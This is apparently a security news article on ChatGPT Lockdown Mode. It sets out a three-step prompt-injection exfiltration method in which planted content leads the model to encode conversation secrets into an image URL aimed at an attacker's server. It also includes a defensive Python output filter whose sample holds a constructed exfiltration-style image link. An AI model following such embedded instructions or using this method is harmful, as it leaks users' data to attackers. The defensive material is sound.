
OpenAI Rolls Out ChatGPT Lockdown Mode to Block Prompt-Injection Data Exfiltration

OpenAI has released ChatGPT Lockdown Mode, a security configuration that prevents ChatGPT from loading external URLs, rendering images from arbitrary sources, or executing third-party plugin calls — the primary vectors for prompt-injection attacks that cause ChatGPT to exfiltrate data to attacker-controlled endpoints. Enterprise and education customers can now enforce Lockdown Mode organisation-wide via the admin console.


OpenAI has released Lockdown Mode for ChatGPT, a security configuration that restricts the AI’s external communication capabilities to prevent the most common class of prompt-injection data exfiltration attack. When enabled, ChatGPT will not load external URLs provided in user prompts, will not render images from arbitrary remote sources, and will not make calls to third-party plugins or custom GPT actions that retrieve external content.

The feature is available for ChatGPT Enterprise and ChatGPT Edu accounts, enforceable organisation-wide by administrators through the admin console. Individual Plus and Team users can enable it per-session from the settings panel.

The Threat Lockdown Mode Addresses

Prompt-injection attacks against AI assistants exploit a fundamental characteristic of large language model systems: the model cannot reliably distinguish between instructions from the authorised user and instructions embedded in content it processes. When ChatGPT reads a document, browses a webpage, or processes an image, adversarial instructions embedded in that content can redirect the model’s behaviour.

The most damaging class of these attacks combines prompt injection with an exfiltration channel. An attacker who controls a webpage or document that a user will ask ChatGPT to process can embed instructions that cause ChatGPT to:

  1. Extract sensitive information from the conversation (email content, document text, API keys the user has shared)
  2. Construct a URL encoding that exfiltrated data
  3. Request that URL as an image or resource load — sending the data to an attacker-controlled server

This attack class has been demonstrated repeatedly in research settings and has been reported in real-world incidents involving users who asked ChatGPT to summarise emails containing embedded malicious content, or to analyse documents from unknown sources.

Lockdown Mode prevents the exfiltration step: because ChatGPT can no longer load external URLs or make external API calls, the attack chain is broken even if the prompt-injection instruction is successfully embedded in content.

What Lockdown Mode Restricts

Disabled in Lockdown Mode:

  • External URL loading from user prompts
  • Image rendering from arbitrary remote URLs (including tracking pixels and exfiltration beacons)
  • Third-party plugin API calls
  • Custom GPT action calls that retrieve external content
  • Code interpreter file exfiltration via network calls

Remains available in Lockdown Mode:

  • Text generation and analysis
  • Code generation (no execution)
  • File analysis (PDF, documents) for text content
  • ChatGPT’s built-in capabilities that do not require external network calls
  • Browsing capability remains available but restricted to a curated set of approved domains (configurable by enterprise admins)
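
The same control can be applied at the rendering layer of any assistant front end. The following is an added example, not OpenAI's implementation or code from this article: a filter that replaces Markdown images and links in assistant output with inert text unless the host is on an approved list. The domain names, `APPROVED_DOMAINS` and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Assumption: constructed stand-in for an admin-approved domain list.
APPROVED_DOMAINS = {"docs.example.internal", "wiki.example.internal"}

# Markdown image ![alt](url) or link [text](url); group 1 is "!" for images.
MD_REF = re.compile(r"(!?)\[([^\]]*)\]\(\s*<?([^)\s>]+)>?[^)]*\)")

def _parts(url):
    """Parse defensively: malformed URLs yield empty fields and fail closed."""
    try:
        p = urlsplit(url)
        return p.scheme.lower(), (p.hostname or "").lower().rstrip("."), p.query
    except ValueError:
        return "", "", ""

def host_allowed(url, approved=APPROVED_DOMAINS):
    """True only for https URLs whose host is an approved domain or its subdomain."""
    scheme, host, _ = _parts(url)
    if scheme != "https" or not host:
        return False
    return any(host == d or host.endswith("." + d) for d in approved)

def sanitize_output(text, approved=APPROVED_DOMAINS):
    """Return (clean_text, blocked); blocked holds (kind, host, query_length)."""
    blocked = []

    def repl(m):
        kind = "image" if m.group(1) else "link"
        if host_allowed(m.group(3), approved):
            return m.group(0)
        _, host, query = _parts(m.group(3))
        blocked.append((kind, host, len(query)))  # audit-log record
        return f"[blocked {kind}: {m.group(2)}]"  # keep label, drop the URL

    return MD_REF.sub(repl, text), blocked

# Constructed sample of assistant output after processing untrusted content.
SAMPLE = (
    "Summary of the thread.\n"
    "![status](https://collector.example.net/p.png?d=CONSTRUCTED_SAMPLE_VALUE)\n"
    "See [runbook](https://wiki.example.internal/runbook) and "
    "![logo](https://docs.example.internal.example.net/l.png)\n"
)

if __name__ == "__main__":
    print(*sanitize_output(SAMPLE), sep="\n")
```

This covers Markdown references only; a renderer that also accepts raw HTML needs the same host check on `src` and `href` attributes.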

Enterprise Configuration

For ChatGPT Enterprise organisations, Lockdown Mode is enforced through the admin console under Settings → Security → Content and Connectivity Controls. The configuration allows:

  • Global Lockdown Mode: All users in the organisation run in Lockdown Mode by default; individual users cannot override
  • Group-level policies: Apply Lockdown Mode to specific user groups (e.g., finance, legal, HR) that handle sensitive documents while allowing broader access for other groups
  • Approved browsing domains: Whitelist specific domains that ChatGPT may load in Lockdown Mode (e.g., internal documentation sites, specific trusted research sources)

Enterprise DLP integration: ChatGPT Enterprise’s DLP connectors (available for Microsoft Purview and Forcepoint) can be configured to flag conversations in which users share content classified as sensitive. Lockdown Mode reduces the risk that sensitive content shared with ChatGPT can be exfiltrated via prompt injection; DLP policies provide visibility into what content is being shared in the first place.

Limitations and Residual Risk

Lockdown Mode addresses the external exfiltration vector but does not prevent:

  • In-context data leakage: If a user is deceived into asking ChatGPT to summarise a malicious document, the output of that summarisation may include attacker-crafted content that misleads the user
  • Plugin architecture exceptions: Custom GPTs with pre-approved actions configured by the enterprise administrator can still make external calls — the security of those integrations depends on the action’s implementation
  • User-driven exfiltration: Lockdown Mode does not prevent a user from voluntarily copying and pasting ChatGPT output to external systems

The feature represents a meaningful reduction in the AI prompt-injection attack surface, not a complete elimination. Enterprise security programmes should combine Lockdown Mode with user awareness training on AI risks and DLP policies that cover AI platforms as a data handling channel.
